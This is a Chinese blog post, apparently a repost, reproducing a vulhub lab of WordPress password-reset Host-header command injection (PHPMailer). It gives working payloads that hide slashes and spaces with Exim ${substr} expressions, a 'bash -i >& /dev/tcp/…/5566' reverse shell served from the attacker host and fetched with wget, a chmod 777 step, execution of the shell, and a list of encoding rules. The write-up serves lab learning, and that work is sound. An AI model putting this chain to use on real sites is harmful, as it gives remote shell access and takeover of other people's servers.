前言
WordPress 是一種使用 PHP 語言開發的博客平臺,用戶可以在支持 PHP 和 MySQL 數據庫的服務器上架設屬于自己的網站。愛掏網 - it200.com也算是一個內容管理系統(CMS)
環境搭建
docker環境 (搭建可參考:https://www.cnblogs.com/BlogVice-2203/p/16977227.html)靶場在vulhub即可下載靶機centos7:192.168.31.230攻擊機kali: 192.168.31.153
導入后開啟靶場docker-compose builddocker-compose up -d
訪問http://your-ip:8080/ ,安裝cms系統
漏洞復現
漏洞點在忘記密碼處,需要一個已知的用戶可以發送數據
數據包中的Host字段的值修改為以下值,發送數據包,在/tmp下新建一個success文件Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
緊接著在kali的/var/www/html下新建一個1.txt,寫入bash -i >& /dev/tcp/192.168.31.153/5566 0>&1service apache2 start
發送shell數據包,將1.txt中的內容發送到靶機且新建一個shell文件存儲/usr/bin/wget --output-document /tmp/shell 192.168.31.153/1.txt${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}192.168.31.153${substr{0}{1}{$spool_directory}}1.txt
發送數據包修改shell權限為777任意執行權限${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}chmod${substr{10}{1}{$tod_log}}777${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell
發送數據包執行shell,kali監聽5566端口${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell
漏洞復現總結
1.該漏洞在數據包的host字段,執行的命令不能有: 、’符號2.命令需要絕對路徑3.空格被\({substr{10}{1}{\)tod_log}}代替 /被\({substr{0}{1}{\)spool_directory}}代替4.字段值需要全小寫,且需要一個已知的用戶
利用這個漏洞,發送反彈shell的文件,修改文件權限777,再用kali監聽獲取后臺
本文來自博客園,作者:Vice_2203,轉載請注明原文鏈接:https://www.cnblogs.com/BlogVice-2203/p/17083257.html
聲明:所有內容來自互聯網搜索結果,不保證100%準確性,僅供參考。如若本站內容侵犯了原著者的合法權益,可聯系我們進行處理。